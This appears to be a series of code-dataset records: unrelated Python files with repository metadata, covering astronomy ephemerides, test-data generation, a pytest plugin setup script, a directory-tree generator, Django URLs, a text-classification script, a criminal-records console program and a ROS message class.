return_Time = Time(dates, format='gps')
elif dates > 2400000.0 and dates < 2500000.0:
return_Time = Time(dates, format='jd')
else:
raise ValueError(f'Invalid format: date as a number should be gps time '
f'or julian date, not {dates}.')
except ValueError:
dates = dates.replace('/', '-')
try:
return_Time = Time(dates, scale='utc')
except ValueError:
raise ValueError(
f'Invalid format: YYYY[/-]M[/-]D [HH:MM:SS], not {dates}')
# add on times
if times is None or abs(times) < 1E-6:
return return_Time
try:
times = float(times)
return return_Time + TimeDelta(times * 3600.0, format='sec')
except ValueError:
pass
sign_of_times = 1.0
if times[0] == '-':
sign_of_times = -1.0
times = times[1:]
add_time = 0.0
for i, d in enumerate(times.split(':')):
add_time += (float(d)) * 3600.0 / (60.0**i)
add_time *= sign_of_times
return return_Time + TimeDelta(add_time, format='sec')
def to_separation(c1, c2):
if not isinstance(c1, SkyCoord):
c1 = SkyCoord(to_Angle(c1[0]), to_Angle(c1[1]))
if not isinstance(c2, SkyCoord):
c2 = SkyCoord(to_Angle(c2[0]), to_Angle(c2[1]))
return c1.separation(c2)
class BaseEphem:
param = ['times', 'ra', 'dec', 'az', 'el', 'x', 'y', 'z', 'D', 'dt',
'radot', 'decdot', 'azdot', 'eldot', 'xdot', 'ydot', 'zdot',
'Ddot', 'Ddotdot']
def __init__(self):
"""
Provides an init'd base class for ephemerides per:
times : Time
dt : np.array
ra, dec, az, el: Angle
radot, decdot, azdot, eldot: deg/sec (Quantity)
x, y, z: m (Quantity)
xdot, ydot, zdot, Ddot: m/s (Quantity)
Ddotdot: m/s/s (Quantity)
"""
self.initall()
self._E = None # Class archive for interp
self.c0 = Const.c # Get used constants handy
self.au = Const.au
self.ly = 1.0 * u.lyr.to('m')
def initall(self, **kwargs):
for par in self.param:
if par in kwargs.keys():
setattr(self, par, kwargs[par])
else:
setattr(self, par, [])
def elapsed(self, unit='hour'):
elpsd = (self.times.jd - self.times[0].jd)
if unit == 'hour':
elpsd *= 24.0
elif unit.startswith('m'):
elpsd *= (24.0 * 60.0)
elif unit.startswith('s'):
elpsd *= (24.0 * 3600.0)
return elpsd
def to_Time(self, times='times', toffset=None):
"""
Convert the array to Time and set as self.times.
If str, then convert class 'times' variable.
"""
if isinstance(times, str) and times == 'times':
times = self.times
self.times = to_Time(times, toffset)
def to_Angle(self, ang, angle_unit=u.degree, angv=None):
"""
Convert attribute ang to class array.
"""
if angv is None:
angv = getattr(self, ang)
setattr(self, ang, to_Angle(angv, angle_unit))
def interp(self, par, times):
"""
Interpolate attribute par onto times.
par : str
string of the attribute to use
times : Time
times to be interpolated onto.
"""
if self._E is None:
self.reset_base()
clpar = getattr(self._E, f"{par}")
if not len(clpar):
return clpar
try:
parunit = clpar.unit
except AttributeError:
return np.interp(times.jd, self._E.times.jd, clpar)
return u.Quantity(np.interp(times.jd, self._E.times.jd, clpar), parunit)
def reset_base(self):
if self._E is None:
self._E = Namespace()
for par in self.param:
setattr(self._E, par, getattr(self, par))
def at(self, times=None):
"""
Put all data at "times". None to self._E data.
"""
if self._E is None: # Set ephem archive data
self.reset_base()
if times is None:
for par in self.param:
setattr(self, par, getattr(self._E, par))
else:
self.to_Time(times)
for par in self.param:
if par != 'times':
setattr(self, par, self.interp(par, times))
def calc_dt(self):
"""
Compute self.dt in sec as ndarray Quantity.
"""
self.dt = [0.0] # in seconds
for i, _t in enumerate(self.times[1:]):
self.dt.append((_t - self.times[i]).value * 3600.0 * 24.0)
self.dt[0] = self.dt[1]
self.dt = np.array(self.dt) * u.second
def smooth_array(self, arr, smooth):
try:
anit = arr.unit
except AttributeError:
anit = None
if smooth:
if anit is not None:
return u.Quantity(convolve(arr, Gaussian1DKernel(smooth), boundary='extend'), anit)
else:
return convolve(arr, Gaussian1DKernel(smooth), boundary='extend')
else:
return arr
def vis(self, arr, val=0.0, horizon=0.0):
"""
Get filter for visible above horizon. Those below the horizon are set to val.
Usage is to call e.g. visible_doppler = self.vis(self.doppler)
"""
varr = np.array(arr)
varr[np.where(self.el < horizon)] = val
return varr
def dbydt(self, par, smooth=None, unwrap=False):
if '.' in par:
ns = getattr(self, par.split('.')[0])
par = par.split('.')[1]
else:
ns = self
if self.dt is None or len(self.dt) != len(getattr(ns, par)):
self.calc_dt()
deriv = f"{par}dot"
setattr(ns, deriv, [0.0])
if unwrap:
_param = np.unwrap(getattr(ns, par))
else:
_param = getattr(ns, par)
_param = self.smooth_array(_param, smooth)
for i, _pp in enumerate(_param[1:]):
getattr(ns, deriv).append((_pp - _param[i])/self.dt[i+1])
getattr(ns, deriv)[0] = getattr(ns, deriv)[1]
setattr(ns, deriv, u.Quantity(getattr(ns, deriv)))
| [
"akgagnebin@csus.edu"
] | akgagnebin@csus.edu |
94e1bcfdf5adabec1171a6844867b600be9ef5e8 | c93b0f008d0977e0b9327ad8b930489f5cccae97 | /platfrom/testdata/RawQosBuffering.py | 3dbfb80b4f23f72c376766ece3d0dc34e83de492 | [] | no_license | ParkPan/ATCasePackage | 15caa664bd94c014ccbd1780353bfc5fcc0caa87 | edad6c1d5a343c740e251821fee0c29336f3d435 | refs/heads/master | 2020-06-16T02:44:06.323352 | 2016-12-01T03:46:44 | 2016-12-01T03:46:44 | 75,251,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,336 | py | import random
import sys
import os
import datavars
import dataprovider
sys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))
from commonfunc import get_timestamp_by_time
class RawQosBuffering(dataprovider.Dataprovider):
tablename = 'raw_input_qos_buffering'
@classmethod
def gettablename(cls):
return cls.tablename
def makedata(self):
data_format = '%s,%d,%s,%s,itsavvidstring,%s,1111,222,%d,%d\n'
with open(os.path.abspath(os.path.dirname(__file__)) + '/RawQosBuffering.txt', 'w') as filedemanddata:
for i in range(24):
for j in [2, 6, 15, 26]:
id = datavars.id_range[random.randint(0,14)]
timestamp = get_timestamp_by_time(datavars.time_format% (i, j))
peerid = datavars.peeid_range[random.randint(0,9)]
url = datavars.url_range[random.randint(0,4)]
type = datavars.type_range[random.randint(0, 3)]
line = data_format % (
id, int(timestamp), peerid, url, type, int(timestamp)+random.randint(1,100),
int(timestamp) + random.randint(100,10000))
filedemanddata.write(line)
return os.path.abspath(os.path.dirname(__file__)) + '/RawQosBuffering.txt'
| [
"panpan@cloutropy.com"
] | panpan@cloutropy.com |
ec88adb74b40ae3b44f04b1e117c8c881872eb99 | ba2d24fd6c5ce7d490ee57f224fd5435a1132093 | /setup.py | 7b0ac69b67ea99435a867d57e8b00a0787e5f3aa | [
"MIT"
] | permissive | FlowerOda/pytest-auto-parametrize | cb2aff37308bff571b980da88f222f8b88e4e36b | 9db33bb06de13c26f753bfd18e254ce10ae1256c | refs/heads/master | 2022-01-09T16:54:33.796383 | 2018-10-09T08:56:09 | 2018-10-09T08:56:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,591 | py | from setuptools import setup
from setuptools.command.test import test as TestCommand
import sys
__version__ = 'unknown'
# "import" __version__
for line in open('pytest_auto_parametrize.py'):
if line.startswith('__version__'):
exec(line)
break
class PyTest(TestCommand):
"""Enable "python setup.py test".
Stripped down from:
http://doc.pytest.org/en/latest/goodpractices.html#manual-integration
"""
def run_tests(self):
import pytest
sys.exit(pytest.main([]))
setup(
name='pytest-auto-parametrize',
py_modules=['pytest_auto_parametrize'],
version=__version__,
author='Matthias Geier',
author_email='Matthias.Geier@gmail.com',
description='pytest plugin: avoid repeating arguments in parametrize',
long_description=open('README.rst').read(),
license='MIT',
keywords='parametrized testing'.split(),
url='https://github.com/mgeier/pytest-auto-parametrize',
platforms='any',
zip_safe=True,
classifiers=[
'Framework :: Pytest',
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
],
entry_points={
'pytest11': ['pytest_auto_parametrize = pytest_auto_parametrize'],
},
tests_require=['pytest'],
cmdclass={'test': PyTest},
)
| [
"Matthias.Geier@gmail.com"
] | Matthias.Geier@gmail.com |
e47a19d0e98b34194eaab7401587fb61ac2f78e9 | e1ce0e26628f05c599097aca11a72d1873497333 | /random_tree/root/Root.py | 4916caa15b8d72e8905541511952c2b6c9b9355b | [] | no_license | lbmello/random-tree-generator | 05a1ecd6a594d23aea6d10d45b5e77f38bd5772f | aa6bd07b69a94244f31adf8c7b5e04bc6d741b30 | refs/heads/master | 2021-04-21T13:33:43.642712 | 2020-04-15T23:30:54 | 2020-04-15T23:30:54 | 249,784,345 | 1 | 0 | null | 2021-03-25T23:34:21 | 2020-03-24T18:17:39 | Python | UTF-8 | Python | false | false | 2,037 | py | """Modulo Root."""
from datetime import datetime
from random import randint
import hashlib
import os
from ..queue import FolderQueue
from ..data import YamlReader
class Root(object):
"""Gerencia o diretório onde a árvore será gerada."""
# Configuracoes lidas do arquivo YAML
path = YamlReader.path
levels = YamlReader.levels
size = YamlReader.size
debug = YamlReader.debug
def __init__(self):
self.path = Root.path
try:
os.mkdir(self.path)
if Root.debug == True:
print(f'Diretorio Raiz criado em {self.path}')
except FileExistsError:
if Root.debug == True:
print('Diretorio Raiz ja criado!')
@classmethod
def add_existing_subdir_to_queue(cls):
"""Se a fila estiver vazia, percorre o diretorio atual e adiciona subpastas na fila."""
if FolderQueue.is_empty():
for dirpath, _, _ in os.walk(top=cls.path, topdown=True):
FolderQueue.fila.push(dirpath)
@classmethod
def n_file_elements(cls):
"""Retorna algum inteiro randomico entre 1 e 3*{size} para gerar arquivos."""
return randint(1, (3 * Root.size))
@classmethod
def n_folder_elements(cls):
"""Retorna algum inteiro randomico entre 1 e 2*{size} para gerar pastas."""
return randint(1, (2 * Root.size))
@classmethod
def random_value(cls):
"""Retorna string com uma hash MD5 aleatoria, gerada a partir da hora atual, multiplicado por um valor de 1 a 1000000."""
#TODO: Refatorar seguinte altaracao de valores!
random_value = datetime.now()
random_value = str(random_value)
random_value = random_value.replace('-','').replace(':','').replace(' ','').replace('.','')
random_value = random_value * (randint(0, 1000000))
random_value = bytes(random_value, encoding='utf8')
obj = hashlib.md5()
obj.update(random_value)
return obj.hexdigest() | [
"lucasbmello96@gmail.com"
] | lucasbmello96@gmail.com |
064b469872ad95e7487c3cf649ca3cfa62170bdd | 6f05f7d5a67b6bb87956a22b988067ec772ba966 | /data/test/python/068d64a694460d83bc9a67db9e2e5f1e4e03d3c3urls.py | 068d64a694460d83bc9a67db9e2e5f1e4e03d3c3 | [
"MIT"
] | permissive | harshp8l/deep-learning-lang-detection | 93b6d24a38081597c610ecf9b1f3b92c7d669be5 | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | refs/heads/master | 2020-04-07T18:07:00.697994 | 2018-11-29T23:21:23 | 2018-11-29T23:21:23 | 158,597,498 | 0 | 0 | MIT | 2018-11-21T19:36:42 | 2018-11-21T19:36:41 | null | UTF-8 | Python | false | false | 717 | py | from django.conf.urls import url
from . import views
SITE_SLUG = "(?P<site_slug>[-_\w]+)"
IMAGE_SLUG = "(?P<image_slug>[-_\w]+)"
urlpatterns = [
# Manage
url(r'^$', views.manage_redirect, name='manage_redirect'),
url(r'^manage/$', views.manage, name='manage'),
url(r'^manage/archives$', views.archives, name='archives'),
url(r'^manage/create/$', views.create, name='create'),
url(r'^manage/create_js/$', views.create_js, name='create_js'),
url(r'^manage/' + IMAGE_SLUG + '/trash$', views.trash, name='trash'),
# View
url(r'^' + IMAGE_SLUG + '$', views.view),
url(r'^' + IMAGE_SLUG + '.thumbnail', views.thumbnail),
url(r'^' + IMAGE_SLUG + '.original', views.original),
]
| [
"aliostad+github@gmail.com"
] | aliostad+github@gmail.com |
d8c4f91ccf0ba1051ab621f1c22873cfde6e7ce0 | c4f8d4cd1d694ea7d75e180743b59642259f7db2 | /11/test11b.py | 497057e79b87b9b680d8e7f74abb4eaa0129e071 | [] | no_license | tuffing/adventofcode2018 | a5caf9ac1af0c94fac5840ed9db9efd6ef490e65 | ac216dcea5af9476dcd44cf529aa108c925fb27c | refs/heads/master | 2020-04-09T21:35:40.860886 | 2019-03-05T08:14:21 | 2019-03-05T08:14:21 | 160,606,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | #!/usr/bin/python3
import unittest
#replace standard with day name
from sol11b import *
sys.path.append('../')
from scaffolding import common
class SolutionTest(unittest.TestCase):
def test_full_solution(self):
#remember to set the assert to the known examples and place the example test into testInput.txt!
testObject = Solution()
self.assertEqual('90,269,16', testObject.solution(18))
if __name__ == '__main__':
unittest.main() | [
"logan.orr@tuffing.co.nz"
] | logan.orr@tuffing.co.nz |
8a76756307d9f3887405c1ec0d882bb33b9bf16b | 2465f683816bd2a58c87a9aea22d1c35a23feb94 | /Part7_project_practice/Section22_text_classification_example/test_classification_example.py | d026235c19bed7e6d39982b3b17fa7160dfe82d8 | [] | no_license | lyx564/machine_learning | 73e1d0cc2aa27c211bfe080082e0bd321df8d630 | dc1214e36f913e783d92400bb81a8f15b74c943f | refs/heads/master | 2022-04-26T23:34:45.748634 | 2020-04-28T09:00:31 | 2020-04-28T09:00:31 | 210,793,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,486 | py | from sklearn.datasets import load_files
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from matplotlib import pyplot as plt
import warnings
warnings.filterwarnings('ignore')
#导入数据
categories = ['alt.atheism', 'rec.sport.hockey', 'comp.graphics', 'sci.crypt', 'comp.os.ms-windows.misc', 'sci.electronics',
'comp.sys.ibm.pc.hardware', 'sci.med', 'comp.sys.mac.hardware', 'sci.space', 'comp.windows.x', 'soc.religion.christian',
'misc.forsale', 'talk.politics.mideast', 'rec.motorcycles', 'talk.politics.misc', 'rec.sport.baseball', 'talk.religion.misc']
#导入训练数据
train_path = '20news-bydate-train'
dataset_train = load_files(container_path=train_path, categories=categories)
#导入评估数据
test_path = '20news-bydate-test'
dataset_test = load_files(container_path=test_path, categories=categories)
#数据准备和理解
# #计算词频
# count_vect = CountVectorizer(stop_words='english', decode_error='ignore')
# X_train_counts = count_vect.fit_transform(dataset_train.data)
# #查看数据维度
# print(X_train_counts.shape)
#计算TF-IDF
tf_transformer = TfidfVectorizer(stop_words='english', decode_error='ignore')
X_train_counts_tf = tf_transformer.fit_transform(dataset_train.data)
# #查看数据维度
# # print(X_train_counts_tf.shape)
#设置评估算法的基准
num_folds = 10
seed = 7
scoring = 'accuracy'
# #评估算法
# #生成算法模型
# models = {}
# models['LR'] = LogisticRegression()
# models['SVM'] = SVC()
# models['CART'] = DecisionTreeClassifier()
# models['MNB'] = MultinomialNB()
# models['KNN'] = KNeighborsClassifier()
#
# #比较算法
# results = []
# for key in models:
# kfold = KFold(n_splits=num_folds, random_state=seed)
# cv_results = cross_val_score(models[key], X_train_counts_tf, dataset_train.target, cv=kfold, scoring=scoring)
# results.append(cv_results)
# print('%s :%f (%f)' % (key, cv_results.mean(), cv_results.std()))
#
# #箱线图比较算法
# fig = plt.figure()
# fig.suptitle('Algorithm Comparision')
# ax = fig.add_subplot(111)
# plt.boxplot(results)
# ax.set_xticklabels(models.keys())
# plt.show()
#
# #算法调参
# param_grid = {}
# #调参LR
# param_grid['C'] = [0.1, 5, 13, 15]
# model = LogisticRegression()
# #调参MNB
# param_grid['alpha'] = [0.001, 0.01, 0.1, 1.5]
# model = MultinomialNB()
# kfold = KFold(n_splits=num_folds, random_state=seed)
# grid = GridSearchCV(estimator=model, param_grid=param_grid, scoring=scoring, cv=kfold)
# grid_result = grid.fit(X=X_train_counts_tf, y=dataset_train.target)
# print('最优:%s 使用 %s' % (grid_result.best_score_, grid_result.best_params_))
# #集成算法
# ensembles = {}
# ensembles['RF'] = RandomForestClassifier()
# ensembles['AB'] = AdaBoostClassifier()
# #比较集成算法
# results = []
# for key in ensembles:
# kfold = KFold(n_splits=num_folds, random_state=seed)
# cv_results = cross_val_score(ensembles[key], X_train_counts_tf, dataset_train.target, cv=kfold, scoring=scoring)
# results.append(cv_results)
# print('%s :%f (%f)' %(key, cv_results.mean(), cv_results.std()))
# #调参RF
# param_grid = {}
# param_grid['n_estimators'] = [10, 100, 150, 200]
# model = RandomForestClassifier()
# kfold = KFold(n_splits=num_folds, random_state=seed)
# grid = GridSearchCV(estimator=model, param_grid=param_grid, scoring=scoring, cv=kfold)
# grid_result = grid.fit(X=X_train_counts_tf, y=dataset_train.target)
# print('最优:%s 使用 %s' % (grid_result.best_score_, grid_result.best_params_))
#生成模型
model = LogisticRegression(C=13)
model.fit(X_train_counts_tf, dataset_train.target)
X_test_counts = tf_transformer.transform(dataset_test.data)
predictions = model.predict(X_test_counts)
print(accuracy_score(dataset_test.target, predictions))
print(classification_report(dataset_test.target, predictions))
| [
"905389852@qq.com"
] | 905389852@qq.com |
66b57785e5149d4bf5dac17fb77176cb1ed8d035 | 101099a41b71294f2964b5158637551b68dd731d | /apps/siteinfo/migrations/0003_auto_20180425_1653.py | 89c01b67b084ec6018c5f97a67f9112683b0a794 | [] | no_license | edos21/ironmanedgar | ccb5c2c5cc4c3784f70c17fb496b44cc3642de12 | 98c8584d783043378a92296b892ea6be565f1a17 | refs/heads/master | 2023-07-26T19:59:31.909343 | 2019-06-04T15:16:31 | 2019-06-04T15:16:31 | 117,257,432 | 0 | 0 | null | 2021-09-08T01:17:31 | 2018-01-12T15:31:06 | CSS | UTF-8 | Python | false | false | 599 | py | # Generated by Django 2.0.1 on 2018-04-25 16:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('siteinfo', '0002_auto_20180424_2031'),
]
operations = [
migrations.RemoveField(
model_name='siteinfo',
name='sections',
),
migrations.AlterField(
model_name='siteinfo',
name='twitter',
field=models.URLField(blank=True, null=True, verbose_name='Twitter'),
),
migrations.DeleteModel(
name='Section',
),
]
| [
"edos21@gmail.com"
] | edos21@gmail.com |
d81651484faccd305d861d1627813a8342900501 | 282b31c5f6c2a04b4037a2be13602b19cbc4957e | /Python-labs/-9/Завдання 2 (Лаб 9).py | 1e577124314af69b5ed7ba127f7507c2bc122f78 | [] | no_license | Fabritsi/Python-labs | 72d52a428eb0d3c65d441f585a14ff49072acc4e | 20f0879953c0322a005e52aacd6a0dc00f5783f9 | refs/heads/main | 2023-03-07T08:12:24.337303 | 2021-02-21T10:14:07 | 2021-02-21T10:14:07 | 340,864,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,082 | py | InspectorDict = {"LastName": "", "Name": "", "Surname": "", "BornDate": 0, "TypeOfCrime": "", "Judgment": "" }
arrayOfInspectorDict = []
def serch(choose, criteria):
if choose == 1:
for i in range(len(arrayOfInspectorDict)):
if arrayOfInspectorDict[i]["LastName"] == criteria:
print(arrayOfInspectorDict[i])
if choose == 2:
for i in range(len(arrayOfInspectorDict)):
if arrayOfInspectorDict[i]["Name"] == criteria:
print(arrayOfInspectorDict[i])
if choose == 3:
for i in range(len(arrayOfInspectorDict)):
if arrayOfInspectorDict[i]["Surname"] == criteria:
print(arrayOfInspectorDict[i])
if choose == 4:
for i in range(len(arrayOfInspectorDict)):
if arrayOfInspectorDict[i]["BornDate"] == criteria:
print(arrayOfInspectorDict[i])
if choose == 5:
for i in range(len(arrayOfInspectorDict)):
if arrayOfInspectorDict[i]["TypeOfCrime"] == criteria:
print(arrayOfInspectorDict[i])
if choose == 6:
for i in range(len(arrayOfInspectorDict)):
if arrayOfInspectorDict[i]["Judgment"] == criteria:
print(arrayOfInspectorDict[i])
while True:
print("\n")
print("1. Вивести всю інформацію\n"
"2. Ввести данні про злочинця\n"
"3. Знайти злочинця\n"
"4. Вийти\n")
choose = int(input("Виберіть позицію:"))
if choose == 1:
print(arrayOfInspectorDict)
elif choose == 2:
'''----Ввід даних про студента----'''
LastName = input("Введіть прізвище: ")
Name = input("Введіть ім'я: ")
Surname = input("По - батькові: ")
BornDate = int(input("Рік народження: "))
TypeCrime = input("Вид злочину: ")
Judgment = input("Покарання: ")
InspectorDict = {"LastName": LastName, "Name": Name, "Surname": Surname, "BornDate": BornDate, "TypeOfCrime": TypeCrime, "Judgment": Judgment}
'''---Заповнення словника---'''
InspectorDict["LastName"] = LastName
InspectorDict["Name"] = Name
InspectorDict["Surname"] = Surname
InspectorDict["BornDate"] = BornDate
InspectorDict["TypeCrime"] = TypeCrime
InspectorDict["Judgment"] = Judgment
arrayOfInspectorDict.append(InspectorDict)
elif choose == 3:
print("Знайти за:\n"
"1.Прізвище\n"
"2.Ім'я\n"
"3.По - батькові\n"
"4.Рік народження\n"
"5.Вид злочину\n"
"6.Покарання\n")
choose2 = int(input("Виберіть позицію: "))
if choose2 == 1:
searchCriteria = input("Введіть прізвище злочинця: ")
serch(1, searchCriteria)
if choose2 == 2:
searchCriteria = input("Введіть ім'я злочинця: ")
serch(2, searchCriteria)
if choose2 == 3:
searchCriteria = input("Введіть по - батькові злочинця: ")
serch(3, searchCriteria)
if choose2 == 4:
searchCriteria = int(input("Введіть рік народження злочинця: "))
serch(4, searchCriteria)
if choose2 == 5:
searchCriteria = input("Введіть вид злочину злочинця: ")
serch(5, searchCriteria)
if choose2 == 6:
searchCriteria = input("Введіть покарання для злочинця: ")
serch(6, searchCriteria)
print("\n")
elif choose == 4:
break
else:
print("Ведіть коректне число\n")
| [
"noreply@github.com"
] | noreply@github.com |
ea30277fdda4769bc035c83cf910f8660e83b049 | 421f6ce9490876be113e5ed1ac173b1f6d70cb66 | /newYork/new_york_analysis/recursive_top_level/u_craigslist4237915975/craigslist4237915975scraper/craigslist4237915975scraper/items.py | 2ed8d4fb8cf4de54768e328577d307baa7ea0dfc | [] | no_license | EricSchles/humanTraffickingTalk | a1f4770c4380ea0424663baac79686be5b74733a | f399e6e6188601f34eab3fd8e7fc4a3ca30d9b14 | refs/heads/master | 2021-01-01T06:11:24.424134 | 2014-08-14T18:51:23 | 2014-08-14T18:51:23 | 14,879,906 | 17 | 5 | null | 2019-10-15T11:10:13 | 2013-12-03T01:15:11 | Python | UTF-8 | Python | false | false | 134 | py |
from scrapy.item import Item, Field
class craigslist4237915975Item(Item):
title = Field()
link = Field()
desc = Field()
| [
"ericschles@gmail.com"
] | ericschles@gmail.com |
6656fbf5045a123bc70ed91d5be5aa25e2d69c09 | a0b8d47e87d33b5d7518d01278fb3556cfd941a6 | /devel/lib/python2.7/dist-packages/core_msgs/msg/_multiarray.py | 18a82c2e0e3c38e18b75b34654faccd0ea861698 | [] | no_license | dhhan120/capstone_2_Cgroup | 66c22ebb64e7d077a1729e39854897bcff2affc9 | 71382bc36a77c3bb783bc81e151f6c377de9205d | refs/heads/master | 2020-11-25T17:51:29.295490 | 2019-12-19T08:51:53 | 2019-12-19T08:51:53 | 228,779,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,223 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from core_msgs/multiarray.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import std_msgs.msg
class multiarray(genpy.Message):
_md5sum = "5f8105e16e9e9d9f45d4acb38630a37d"
_type = "core_msgs/multiarray"
_has_header = True #flag to mark the presence of a Header object
_full_text = """Header header
int8[] data
int32 cols
int32 rows
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
"""
__slots__ = ['header','data','cols','rows']
_slot_types = ['std_msgs/Header','int8[]','int32','int32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,data,cols,rows
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(multiarray, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.msg.Header()
if self.data is None:
self.data = []
if self.cols is None:
self.cols = 0
if self.rows is None:
self.rows = 0
else:
self.header = std_msgs.msg.Header()
self.data = []
self.cols = 0
self.rows = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(struct.pack(pattern, *self.data))
_x = self
buff.write(_get_struct_2i().pack(_x.cols, _x.rows))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.data = struct.unpack(pattern, str[start:end])
_x = self
start = end
end += 8
(_x.cols, _x.rows,) = _get_struct_2i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(self.data.tostring())
_x = self
buff.write(_get_struct_2i().pack(_x.cols, _x.rows))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)
_x = self
start = end
end += 8
(_x.cols, _x.rows,) = _get_struct_2i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_2i = None
def _get_struct_2i():
global _struct_2i
if _struct_2i is None:
_struct_2i = struct.Struct("<2i")
return _struct_2i
| [
"dhhan218@kaist.ac.kr"
] | dhhan218@kaist.ac.kr |
6e907d99daab017e865c8e55609d42b30531e01b | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4069/codes/1578_1331.py | f6e61de10d8ff19b5aa7a45b3dc1f2599615276b | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30 | py | x = 50//3
y = 50%3
print(x, y) | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
